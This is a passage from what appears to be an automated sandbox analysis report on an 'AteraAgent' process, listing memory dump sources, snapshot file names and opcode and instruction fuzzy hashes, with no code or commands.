                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 90c2833f0a9c44c4ed7cfb53cecf356e87dcdfd84cc19b400202e29fae2cb0f5
                                                                                                                                                                                                                                                                                                • Instruction ID: 189f26a258445f62443cf7f956fbf1b718d858eb24c71eb3633c7eb496fb7bdd
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90c2833f0a9c44c4ed7cfb53cecf356e87dcdfd84cc19b400202e29fae2cb0f5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6E09A03F0E99E4AE5B4E09C28552A84682CBC8A7077A06BAE41DC22A9E8092D4702D0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 67f6c78042836790eba17300cbb4041b15c3a1342f4775502bef79dbb101d865
                                                                                                                                                                                                                                                                                                • Instruction ID: f1536c9654585815c86853b952456e36dd740283319e3d1d5191e71b6b051e99
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67f6c78042836790eba17300cbb4041b15c3a1342f4775502bef79dbb101d865
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5E0653170981E8FE6E5E74CE4247B4B3E2FF98321B6201B2D00EC3262DE26AD418740
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 330e136c6b374bb2ef3786c7809265f131cb6b3b687e16bcba7299c09bba36fa
                                                                                                                                                                                                                                                                                                • Instruction ID: b91676c43418794bca1f83b3e86829e7e54c4fba861add5241eb6d32b5c08a29
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 330e136c6b374bb2ef3786c7809265f131cb6b3b687e16bcba7299c09bba36fa
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF0D0A5E2591D5BEB94F7989895AAC73B2FF98B50F810064E058E32A2DE396841C701
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 94e345b1d9755b2c69af2ca45cfd3ed9f297734a28d24aea9592c11269079b8a
                                                                                                                                                                                                                                                                                                • Instruction ID: f2cee6c052ea0a6ec167b72af5ac6ff8a82c2d0c1597ca0df1c94dbd7b97cf94
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94e345b1d9755b2c69af2ca45cfd3ed9f297734a28d24aea9592c11269079b8a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BEE06801F0FFAC0FE675EAFE5C760607AD2EF4180070967BEC09486692EC2879864282
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd